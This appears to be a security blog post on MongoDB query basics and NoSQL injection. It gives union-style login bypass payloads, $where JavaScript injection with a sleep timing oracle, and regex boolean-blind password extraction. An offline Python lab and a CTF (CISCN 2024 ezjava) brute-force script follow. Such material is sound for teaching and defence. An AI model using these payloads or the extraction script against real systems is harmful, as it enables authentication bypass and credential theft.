Reference blog

MongoDB basics

| SQL concept | MongoDB concept | Description |
|---|---|---|
| database | database | database |
| table | collection | table / collection |
| row | document | record row / document |
| column | field | field |
| index | index | index |
| primary key | primary key | primary key; MongoDB automatically uses the `_id` field as the primary key |

| MySQL | MongoDB | Notes |
|---|---|---|
| create database DATABASE_NAME | use DATABASE_NAME | Switches to the database; if it does not exist it is created automatically (materialised on the first write) |
| use DATABASE_NAME | use DATABASE_NAME | |
| database() | db | |
| show databases | show dbs | Databases that contain no data are not listed |
| drop database DATABASE_NAME | db.dropDatabase() | |
| create table test | db.createCollection("myNewCollection") | |
| show tables | show collections / show tables | |
| insert into table_name values('','') | db.mycol2.insert({"name" : "菜鸟教程"}) | If the collection does not exist it is created automatically |
| drop table table_name | db.mycol2.drop() | |
| select * from table_name | db.users.find() | |
| select * from table_name where age>25 | db.myCollection.find({ age: { $gt: 25 } }) | $gt (>), $lt (<), $gte (>=), $lte (<=), $eq (=), $ne (!=) |
| select * from table_name where a>1 and b<1 | db.myCollection.find({$and: [{ age: { $gt: 25 } },{ city: "New York" }]}) | $and, $or, $not, $nor |
| where likes>50 AND (by = '菜鸟教程' OR title = 'MongoDB 教程') | db.col.find({"likes": {$gt:50}, $or: [{"by": "菜鸟教程"},{"title": "MongoDB 教程"}]}) | Conditions written side by side in one document are implicitly ANDed |

Union injection

Example: the application builds the query document by string concatenation: `String stringQuery = "{ 'username' : '" + name + "', 'password' : '" + password + "'}";`
With `name=1&password=1` this becomes `{'username':'1','password':'1'}`.
With `username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: '123456` it becomes `{ 'username': 'admin', $or: [ {}, {'a':'a', 'password': '' }], $comment: '123456'}`. The empty `{}` inside `$or` matches every document, so the `$or` clause is always true and the query effectively only checks `username = 'admin'`; the `$comment` key absorbs the template's trailing `'}` so the document still parses.

JavaScript injection

`$where` evaluates a JavaScript function on the server for each candidate document, with `this` bound to the document. For example, finding the user whose username equals `whoami`: `db.users.find({ $where: "function(){return(this.username == 'whoami')}" })`
Making the server sleep, which gives a timing oracle when the query result itself is not visible:
`db.users.find({ $where: "function(){sleep(5000);return(this.username == 'a')}" })`
Any user input concatenated into a `$where` string therefore becomes server-side code. Server-side JavaScript can be switched off in mongod with `security.javascriptEnabled: false`.

Boolean blind injection

`db.users.find({'username':'admin', 'password':{$regex:'.{32}'}})`: `.{32}` matches any run of 32 characters other than `\n`, and the query returns a result. `.{31}` also returns a result, because the pattern is unanchored and any password of at least 31 characters contains such a run.
`db.users.find({'username':'admin', 'password':{$regex:'.{33}'}})`: `.{33}` returns nothing.
So the password is exactly 32 characters long. (Anchoring the pattern as `^.{32}$` makes each probe test the exact length rather than a lower bound.)
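The following is an added example, not code from this page or from the CTF: a small offline lab in Python that reproduces both attacks described above (the union-style rewrite of a string-built login query, and regex-based boolean blind extraction) without a MongoDB server. `relaxed_parse` is a deliberately minimal stand-in for the Java driver's lenient document parser, `matches` implements only the subset of MongoDB query semantics the payloads need, and the user records, the 32-character password, `vulnerable_login`, `safe_login` and `oracle` are all constructed for the demo.

```python
"""Offline NoSQL-injection lab: in-memory stand-ins for a lenient document
parser and for MongoDB's matcher, plus the union and boolean-blind attacks.
Everything here (users, password, helper names) is constructed for the demo."""
import json
import re

# Constructed sample collection; the admin password is a fake 32-char hex string.
USERS = [
    {"username": "admin", "password": "5f4dcc3b5aa765d61d8327deb882cf99"},
    {"username": "guest", "password": "guest"},
]


def relaxed_parse(text):
    """Stand-in for a lenient MongoDB document parser: accepts bare keys such
    as $or and single-quoted strings, both rejected by json.loads. Enough for
    the payloads on this page; not a general parser."""
    quoted_keys = re.sub(r"([{,]\s*)(\$?\w+)(\s*:)", r'\1"\2"\3', text)
    return json.loads(quoted_keys.replace("'", '"'))  # duplicate keys: last wins


def matches(doc, query):
    """Subset of MongoDB matching: implicit AND over fields, $and/$or, $regex,
    $comment (ignored); anything else is an equality test. {} matches all."""
    for key, cond in query.items():
        if key == "$comment":
            continue
        if key == "$and":
            if not all(matches(doc, sub) for sub in cond):
                return False
        elif key == "$or":
            if not any(matches(doc, sub) for sub in cond):
                return False
        elif isinstance(cond, dict) and "$regex" in cond:
            if not re.search(cond["$regex"], str(doc.get(key, ""))):
                return False
        elif doc.get(key) != cond:
            return False
    return True


def find(query):
    return [doc for doc in USERS if matches(doc, query)]


def vulnerable_login(name, password):
    """The page's Java pattern: the query is assembled as text and parsed
    afterwards, so input can change the structure of the query."""
    query = "{ 'username' : '" + name + "', 'password' : '" + password + "'}"
    return find(relaxed_parse(query))


def safe_login(name, password):
    """Hardened form: inputs are values inside an already-built document,
    never part of the document text, so quotes and operators in them are inert."""
    return find({"username": name, "password": password})


# Union payload from the text, split into the two form fields.
UNION_NAME = "admin', $or: [ {}, {'a': 'a"
UNION_PASSWORD = "' }], $comment: '123456"


def oracle(regex):
    """True if login succeeds with `regex` applied to admin's password. The
    password field closes the template string, adds a $regex condition on
    password and re-adds username so the template's trailing '} parses."""
    payload = "','password':{'$regex':'" + regex + "'},'username':'admin"
    return bool(vulnerable_login("admin", payload))


def password_length(max_len=64):
    """Unanchored .{n} matches any password of at least n characters (the text
    notes .{31} and .{32} both succeed), so the length is the last n that
    still logs in. ^.{n}$ would test each length exactly instead."""
    for n in range(1, max_len + 1):
        if not oracle(".{%d}" % n):
            return n - 1
    return None  # longer than max_len, or no such user


def extract_password(length, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover the password one character at a time with ^<prefix><c>.*"""
    recovered = ""
    for _ in range(length):
        for ch in alphabet:
            if oracle("^" + recovered + re.escape(ch) + ".*"):
                recovered += ch
                break
        else:
            break  # no candidate matched: the alphabet is incomplete
    return recovered


if __name__ == "__main__":
    print("union, vulnerable:", vulnerable_login(UNION_NAME, UNION_PASSWORD))
    print("union, hardened:  ", safe_login(UNION_NAME, UNION_PASSWORD))
    length = password_length()
    print("blind, length:", length, "password:", extract_password(length))
```

Running the block directly shows the vulnerable login returning the admin record for the union payload while the hardened form returns nothing, then the blind oracle recovering the length and the full password. Note that `safe_login` is only safe while `name` and `password` are guaranteed to be strings; an input layer that decodes JSON bodies into objects has to enforce that before building the document.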

CISCN 2024 Central China division: ezjava


```python
import requests

url = "http://127.0.0.1:9999/login"
mylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
proxies = {}  # e.g. {"http": "http://127.0.0.1:8080"} to watch the traffic in Burp

# The password length (32) was established with the .{n} regex probes above.
for i in range(32):
    for j in mylist:
        # The password field closes the template's string, appends a $regex
        # condition on password and re-adds username; the trailing username
        # entry absorbs the template's closing '} and the duplicate keys
        # resolve to the later values when the document is parsed, so the
        # effective query is {'username':'admin','password':{'$regex':'^<prefix><j>.*'}}
        data = {
            "username": "admin",
            "password": "','password':{'$regex':'^" + password + j + ".*'},'username':'admin",
        }
        #','password':{'$regex':'^x.*'},'username':'admin
        r = requests.post(url, data=data, proxies=proxies)
        # No failure message means the prefix matched: keep the character.
        if r.text.find("username or password incorrect") == -1:
            password += j
            print(password)
            break
```